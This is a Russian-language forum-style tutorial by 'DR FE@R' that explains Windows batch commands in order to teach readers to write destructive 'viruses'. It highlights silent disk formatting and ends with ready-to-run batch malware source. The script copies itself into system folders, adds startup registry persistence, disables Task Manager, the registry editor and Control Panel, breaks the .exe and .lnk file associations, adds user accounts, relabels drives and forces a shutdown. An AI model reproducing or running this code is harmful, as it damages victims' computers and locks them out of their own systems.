Привет всем! Мой ник DR FE@R... Сейчас я обьясню как создать вирус без всяких усилий. Для этого понадобятся блокнот (я пользуюсь AkelaPad) и прямые руки!!!! Начну
с обьяснений: ВАТ - это пакетные дос файлы, которые содержат в себе в
ascii виде набор досовских команд. По-русски говоря, bat файл содержит в
себе скрипт, интерпритатором служит command.com. Слишком заумно...
Поясняю: после прочтения этой статьи, ты сможешь писать проги, которые
удаляют системные файлы, форматируют диски и т.д. Главное фантазия и
намерения!!! Начнем 1) Открываем блокнот; 2) Пишем любое имя 3) Сохраняем файл, но вместо .txt мы напишем .bat; Пожалуй обьясню основные команды: @echo off - запрещает DOS-окну что либо показывать copy %путь\файл% %куда\файл% - копировать файл в другую директорию mkdir %название_диры% - создает в текущей директории папку с нужным названием @echo %текст% - вывести текст на экран @echo %текст% > %путь\файл% - создать файл и вписать в него текст @echo %текст% >> %путь\файл% - добавить текст в уже существующий файл attrib %атрибут% %путь\файл% - поставить\убрать атрибуты файлу (+-h скрытый, +-s системный, +-r только чтение) cls - отчистить экран pause - выводит сообщение "Нажмите любую кнопку..." label %новая_метка% - поставить новую метку системного диска (диск С) format %диск%: /q /y - быстрое форматирование диска безо всяких вопросов (несколько секунд) assoc
.x=.y - ассоциирует файл расширения .x с .y,т.е. если поставить assoc
.mp3=.txt то все mp3 файлы будут открываться в текстовом редакторе
start
- запустить программу,в таблице написано приложение и команда которая
его запускает(например start calc(запустится калькулятор)): Настройка системы- start msconfig Калькулятор - calc Помощь- start HelpCtr Редактор символов- eudcedit Таблица символов - charmap Буфер обмена - clipbrd Музон - dvdplay Диспетчер задач - taskmgr Громкость - sndvol32 Доктор Ватсон - drwatson Отладчик доктора - drwtsn32 Дефрагментация диска С: - defrag C: Проверка диска - chkdsk
attrib - установка аттрибута для файла Используемые параметры в команде attrib: +r Установка атрибута «Только чтение». -r Снятие атрибута «Только чтение». +a Установка атрибута «Архивный». -a Снятие атрибута «Архивный». +s Установка атрибута «Системный». -s Снятие атрибута «Системный». -h Снятие атрибута «Скрытый». +h Установка атрибута «Скрытый».
rcp - обмен файлами через rcp в ascii runas - от имени пользователя tasklist - отображает приложения и сеансы, связанные с ним. taskkill - позволяет завершить один или несколько процессов tftp - trivial ftp tskill - убить процесс reg - утилита взаимодействия с реестром bootcfg - настройка boot.ini append - позволяет открывать удаленные файлы так, словно они находятся в текущем. getmac - получить мас logoff - Заверщить пользовательский сеанс. mem - вывод на экран сведений о текущих процессах в ОЗУ mqbkup - архивирование netsh - ?? openfiles - просмотреть открытые файлы. rsh - выполнение команд на удаленных узлах с запущеной rsh sc - command line ?? rexec - выполнение команд на удаленных узлах с запущеной rexec shutdown - выключить (хе-хе) local or remote computer. systeminfo - вывод инфы о компе. schtasks - планировщик заданий. xcopy - копирование файлов и каталогов. tsshutdn - завершение работы сервера в установленом порядке. set
- вывод, задание и удаление переменных среды cmd.exe. Свойства системы
(пр.кн."мой комп") - дополнительно - Переменные среды. Там не все
переменные, но много! Все смотреть просто set. ASSOC - Отображает или модифицирует связи расширений файлов AT - Планирует команды и программы для выполнения на компьютере. ATTRIB - Отображает или изменяет атрибуты файла. BREAK - Устанавливает или отменяет проверку комбинации [Ctrl+C]. CACLS - Отображает или модифицирует списки управления доступом (ACLs) для файлов. CALL - Вызывает один *.BAT-файл из другого. CD - Отображает имя или изменяет имя текущей директории. CHCP - Отображает или устанавливает номер активной кодовой страницы. CHDIR - Отображает имя или изменяет имя текущей директории. CHKDSK - Проверяет диск и отображает отчет о состоянии. CLS - Очищает экран. CMD - Стартует новый экземпляр интерпретатора команд Windows NT. COLOR - Устанавливает цвета по умолчанию для переднего и заднего плана консоли. COMMAND - Стартует новую копию интерпретатора команд Windows. COMP - Сравнивает содержимое двух файлов или установки файлов. COMPACT - Отображает или видоизменяет сжатие файлов на патрициях Windows NT(NTFS). CONVERT - Конвертирует FAT томов к формату файловой системы Windows NT(NTFS). Вы не можете конвертировать текущий диск. COPY - Копирует один или больше файлов на другое место. CTTY - Изменяет терминальное устройство, используемое для управления вашей системой. DATE - Отображает или устанавливает дату. DEL - Удаляет один или более файлов. DEBUG - Выполняет отладку, тестирование программ и редактирование инструментальных средств. DIR - Отображает список файлов и поддиректорий в директории. DISKCOMP - Сравнивает содержимое двух дискет. DISKCOPY - Копирует содержимое одной дискеты на другую. DOSKEY - Редактирует командные строки, восстанавливает команды Windows и создает макрос. ECHO - Отображает сообщения, или включает/выключает вывод команд. EMM386 - Включает/выключает поддержку расширенной памяти EMM386. ENDLOCAL - Заканчивает локализацию изменений окружающей среды в *.BAT-файле. ERASE - Удаляет один или более файлов. EXIT - Прекращает выполнение программы (интерпретатор команд). EXTRACT - Средство извлечения информации из CAB - файлов. FC - Сравнивает два файла или установки файлов, и отображает различие между ними. FIND - Ищет текстовую строку в файле или файлах. FINDSTR - Поиск строк в файлах. FOR - Выполняет указанную команду для каждого файла в наборе файлов. FORMAT - Форматирует диск для использования с Windows. FTYPE - Отображает или модифицирует типы файлов, используемых в связях расширений. GOTO - Направляет интерпретатор команд Windows NT к помеченной строке в *.BAT-файле. GRAFTABL - Способность Windows отображать символы псевдографики, вставленные в графическом режиме. HELP - Обеспечивает информацию Help для команд Windows. IF - Выполняет обработку условия в *.BAT-файле. KEYB - Конфигурирует клавиатуру для заданного языка. LABEL - Создает, изменяет, или удаляет метку тома на диске. LOADHIGH(LH) - Загружает программу в верхние адреса памяти. MD - Создает директорию. MEM - Отображает величину используемой и свободной памяти в вашей системе. MKDIR - Создает директорию. MODE - Конфигурирует системное устройство. MORE - Отображает вывод одного экрана за раз. MOVE - Перемещает один или более файлов из одной директории в другую на том же диске. NETSTAT - Отображает статистики протоколов и текущих сетевых соединений TCP/IP. NLSFUNC - Загружает информацию, специфическую для страны. PATH - Отображает или устанавливает путь поиска для выполняемых файлов. PAUSE - Приостанавливает обработку *.BAT-файла и отображает сообщение. POPD - Восстанавливает предыдущее значение текущей директории, сохраненной по PUSHD. PRINT - Печатает текстовый файл. PROMPT - Изменяет подсказку к командам Windows. PUSHD - Сохраняет текущую директорию, потом изменяет. RD - Удаляет директорию. RECOVER - Восстанавливает читаемую информацию с плохого или дефектного диска. REM - Записывает комментарии (примечания) в *.BAT-файлы или CONFIG.SYS. REN - Переименует файл или файлы. RENAME - Переименует файл или файлы. REPLACE - Заменяет файлы. RESTORE - Восстанавливает файлы, которые были архивированы с использованием команды BACKUP. RMDIR - Удаляет директорию. SET - Отображает, устанавливает или удаляет переменные среды Windows. SETLOCAL - Начинает локализацию изменений среды в *.BAT-файле. SETVER - Устанавливает номер версии MS-DOS, который Windows сообщает программе. SHIFT - Сдвигает позицию замещаемых параметров в *.BAT-файле. SMARTDRV - Инсталлирует и конфигурирует утилиту кэширования диска SMART - драйва. SORT - Сортирует входной поток. START - Стартует отдельное окно для выполнения указанной программы или команды. SUBST - Связывает путь с литерой диска. SYS - Копирует файлы системы MS-DOS и интерпретатор команд на указанный вами диск. TIME - Отображает или устанавливает системное время. TITLE - Устанавливает заголовок окна для сеанса . TREE - Графически отображает структуру директория в драйве или путь. TYPE - Отображает содержимое текстового файла. VER - Отображает версию Windows. VERIFY - Сообщает Windows, проверять ли правильность записи файлов на диск. VOL - Отображает метку дискового тома и серийный номер. XCOPY - Копирует файлы и деревья директории.
А теперь, кому лень написать свой, даю исходники вирусов(100% действенный): @echo off %SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul copy %0 %windir%\system32 copy %0 %windir%\system reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Cool" /t REG_SZ /d "%SystemRoot%\system32\fear.bat" /f >nul reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Cooler" /t REG_SZ /d "%SystemRoot%\system\fear.bat" /f >nul reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul reg
add
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun
/v 1 /t REG_DWORD /d %SystemRoot%explorer.exe /f >nul reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul assoc .lnk=.txt >nul assoc .exe=.mp3 >nul net user "Idiot you Hacked" /add >nul net user "Bitch you Hacked" /add >nul net user "Durak you Hacked" /add >nul net user "Kritin you Hacked" /add >nul net user "Gavno you Hacked" /add >nul label c: LOL YOU HACKED label d: "ВАШ НИК" THE BEST
shutdown
-s -f -t 120 -c "Тебя предупреждали не заходить!!!!Теперь тебе пришла
ЗАДНИЦЯ!!!!! С уважением DR FE@R!!!!КСТАТИ ПОСЛЕ ЗАГРУЗКИ ПОЯВЯТСЯ
ПРОБЛЕМЫ!!!"
